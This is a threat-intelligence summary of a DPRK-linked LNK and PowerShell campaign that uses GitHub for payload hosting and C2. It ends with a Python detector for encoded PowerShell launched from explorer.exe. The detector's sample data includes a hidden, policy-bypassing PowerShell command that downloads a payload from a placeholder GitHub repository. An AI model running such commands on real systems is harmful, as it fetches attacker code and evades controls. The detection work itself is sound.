Full Report
Analysis of DPRK-linked LNK-based attacks using GitHub as covert C2 infrastructure, detailing multi-stage PowerShell execution, persistence mechanisms, and data exfiltration techniques targeting Windows environments.
Analysis Summary
# Threat Actor: Unofficially linked to DPRK (Likely Lazarus Group or Subgroup)
## Attribution & Identity
* **Primary Attribution:** Democratic People's Republic of Korea (DPRK).
* **Associated Groups:** Often associated with the **Lazarus Group** (and its sub-clusters such as Hidden Cobra, APT38, or BlueNoroff) and **Kimsuky**, due to shared code overlaps and the use of malicious LNK files and multi-stage PowerShell scripts.
* **Aliases:** Diamond Sleet, Sapphire Sleet, or Labyrinth Chollima (depending on specific sub-cluster nuances).
## Activity Summary
The article describes a recent campaign using malicious Windows shortcut (LNK) files disguised as legitimate documents to initiate a multi-stage infection chain. A notable evolution in this campaign is the use of **GitHub** as a covert Command and Control (C2) infrastructure: the actor leverages GitHub repositories to host malicious payloads and receive exfiltrated data, effectively blending in with legitimate developer traffic.
## Tactics, Techniques & Procedures
* **Phishing/Social Engineering:** Delivery of malicious ZIP archives containing LNK files.
* **LNK Execution:** Use of `.lnk` files to execute obfuscated PowerShell commands (T1204.002).
* **Living off the Land (LotL):** Heavy reliance on `powershell.exe` for execution and persistence (T1059.001).
* **Multi-stage Payloads:** Successive stages of PowerShell scripts downloaded from remote repositories to evade detection.
* **Encoding/Obfuscation:** Use of Base64 encoding and XOR operations to hide script logic.
* **Persistence:** Use of Windows Scheduled Tasks or Startup folder shortcuts to maintain access (T1053.005).
* **Abuse of Trusted Services:** Using GitHub for payload hosting and C2 communication (T1102).
## Targeting
* **Sectors:** Cryptocurrency, Financial Services, Defense, and Software Development.
* **Geography:** Primarily South Korea, United States, and Japan.
* **Victims:** Individual professionals (often targeted via LinkedIn or job-related lures) and organizations within the aforementioned sectors.
## Tools & Infrastructure
* **Malware:** Custom PowerShell-based backdoors and downloaders.
* **Infrastructure (C2):**
  * `github[.]com` (Covert C2 hosting)
  * `raw.githubusercontent[.]com` (Payload delivery)
  * Various defanged staging URLs (e.g., `hxxps[://]github[.]com/[account]/[repo]/raw/main/pay.txt`)
* **Data Exfiltration:** Abusing GitHub Issues or Gists to post exfiltrated machine metadata.
## Implications
The shift toward using legitimate platforms like GitHub for C2 infrastructure significantly complicates detection for security teams. By residing on trusted domains, the actor bypasses traditional DNS blacklists and signature-based web filtering. This campaign demonstrates the DPRK’s continued focus on clandestine data theft and financial gain to circumvent international sanctions.
## Mitigations
* **PowerShell Execution Policy:** Set to `AllSigned` or `Restricted` via GPO to prevent unauthorized script execution.
* **Endpoint Detection (EDR):** Monitor for `cmd.exe` or `powershell.exe` being spawned by `explorer.exe` with long, encoded arguments.
* **Network Monitoring:** Inspect traffic to GitHub for unusual patterns, specifically access to "raw" content from unverified or newly created repositories.
* **User Training:** Educate employees on the dangers of opening LNK files or "Shortcuts" sent via unsolicited messages or emails.
* **Attack Surface Reduction:** Implement ASR rules to block executable content from email clients and webmail.
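The EDR rule from the Mitigations list, written out as detection logic in Python over constructed Sysmon-style process-creation events; this is an added example, not code from the report or from any vendor product. It flags a shell spawned directly by `explorer.exe`, recovers the plaintext behind an `-EncodedCommand` argument (UTF-16LE, base64), checks the decoded text for raw GitHub fetches, and also records `-ExecutionPolicy Bypass` on the command line, since the execution policy mitigation above is routinely overridden that way by LNK-launched stages. The sample events, the `EXAMPLE-ACCOUNT/EXAMPLE-REPO` URL and the 200-character length threshold are all constructed assumptions.

```python
import base64
import ntpath
import re
# Constructed stage-1 command of the kind an LNK lure launches (placeholder GitHub URL, not an
# indicator from the report), encoded the way -EncodedCommand expects: UTF-16LE, then base64.
STAGE1_PLAINTEXT = ("iwr https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/main/pay.txt"
                    " -OutFile $env:TEMP\\pay.txt")
ENCODED = base64.b64encode(STAGE1_PLAINTEXT.encode("utf-16le")).decode()
# Constructed process-creation events, shaped like Sysmon Event ID 1 / EDR telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f"powershell.exe -NoP -W Hidden -Ep Bypass -enc {ENCODED}"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Program Files\Acme\agent.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
BYPASS_RE = re.compile(r"-e(?:x[a-z]*|p)\s+bypass", re.I)  # -Ep Bypass / -ExecutionPolicy Bypass
GITHUB_RE = re.compile(r"raw\.githubusercontent\.com|github\.com/\S+/raw/", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext behind an -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Collect the signals that make one event look like an LNK-launched PowerShell stage."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    signals = [
        (ntpath.basename(event["parent"]).lower() == "explorer.exe"
         and ntpath.basename(event["image"]).lower() in SHELLS, "shell spawned by explorer.exe"),
        (decoded is not None, "encoded command present"),
        (len(cmdline) > 200, "unusually long command line"),  # assumed threshold; tune to baseline
        (BYPASS_RE.search(cmdline) is not None, "execution policy bypassed on the command line"),
        (GITHUB_RE.search(decoded or cmdline) is not None, "fetches raw content from GitHub"),
    ]
    return {"cmdline": cmdline, "decoded": decoded, "reasons": [t for hit, t in signals if hit]}

def scan(events):
    """Report events carrying two or more signals, so a single weak signal stays quiet."""
    return [a for a in map(analyze_event, events) if len(a["reasons"]) >= 2]
```

Feed `scan()` real process-creation telemetry in the same field shape; the decoded text in each hit is what an analyst would otherwise have to recover by hand before pivoting to the GitHub account it names.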